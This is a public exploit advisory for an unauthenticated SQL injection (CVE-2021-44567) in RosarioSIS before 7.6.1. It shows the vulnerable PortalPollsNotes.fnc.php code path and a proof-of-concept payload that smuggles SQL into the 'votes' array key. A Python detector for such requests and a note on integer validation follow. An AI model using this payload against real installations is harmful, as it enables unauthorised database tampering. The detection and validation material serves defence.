## https://sploitus.com/exploit?id=PACKETSTORM:190426
# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
    # Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
    # Version: [7.6] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2021-44567]
    
    PoC:
    POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
    X-Requested-With: XMLHttpRequest
    
    Constraints and code flow:
    if ( isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' )
    {
        foreach ( (array) $_POST['votes'] as $poll_id => $votes_array )
        {
            if ( ! empty( $votes_array ) )
            {
                // $poll_id is the request-supplied array key.
                PortalPollsVote( $poll_id, $votes_array );
            }
        }
    }
    
    votes['; CREATE TABLE aaa(t text) --]=1
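
A detection-side check for the request shape above, as an added example that is not part of the original advisory or of RosarioSIS: it flags POSTs to PortalPollsNotes.fnc.php whose `votes[...]` array key is not a plain integer. The function names, the sample requests and the rule that legitimate poll ids are integers are assumptions.

```python
import re
from urllib.parse import unquote_plus

TARGET = "/ProgramFunctions/PortalPollsNotes.fnc.php"
# The first bracketed segment of a votes[...] field name is what PHP exposes as $poll_id.
VOTES_KEY = re.compile(r"^votes\[([^\]]*)\]")
# Assumption: real poll ids are integers; an empty key (votes[]) is auto-numbered by PHP.
INTEGER_KEY = re.compile(r"[0-9]*")


def non_integer_poll_ids(method, path, body):
    """Return the poll-id keys in a form-encoded body that are not plain integers."""
    # endswith() tolerates installs under a sub-directory such as /rosariosis/.
    if method.upper() != "POST" or not path.split("?", 1)[0].endswith(TARGET):
        return []
    flagged = []
    # PHP splits form bodies on "&" only, so split first and URL-decode afterwards.
    for pair in body.split("&"):
        name = unquote_plus(pair.split("=", 1)[0])
        match = VOTES_KEY.match(name)
        if match and not INTEGER_KEY.fullmatch(match.group(1)):
            flagged.append(match.group(1))
    return flagged


# Constructed sample requests (method, path, body); not taken from real traffic.
SAMPLES = [
    ("POST", TARGET, "votes%5B12%5D%5B%5D=1&votes%5B12%5D%5B%5D=3"),
    ("POST", TARGET, "votes%5B%27%3B+CREATE+TABLE+aaa%28t+text%29+--%5D=1"),
    ("POST", "/index.php", "votes%5Bx%5D=1"),  # other endpoint: out of scope
]


def scan(samples):
    """Return (sample index, flagged keys) for every request that trips the check."""
    results = []
    for index, (method, path, body) in enumerate(samples):
        keys = non_integer_poll_ids(method, path, body)
        if keys:
            results.append((index, keys))
    return results


if __name__ == "__main__":
    for index, keys in scan(SAMPLES):
        print(f"request {index}: non-integer poll id key(s): {keys}")
```

The same integer-only rule, enforced server-side on `$poll_id` before it reaches `PortalPollsVote()`, is the corresponding input-validation control.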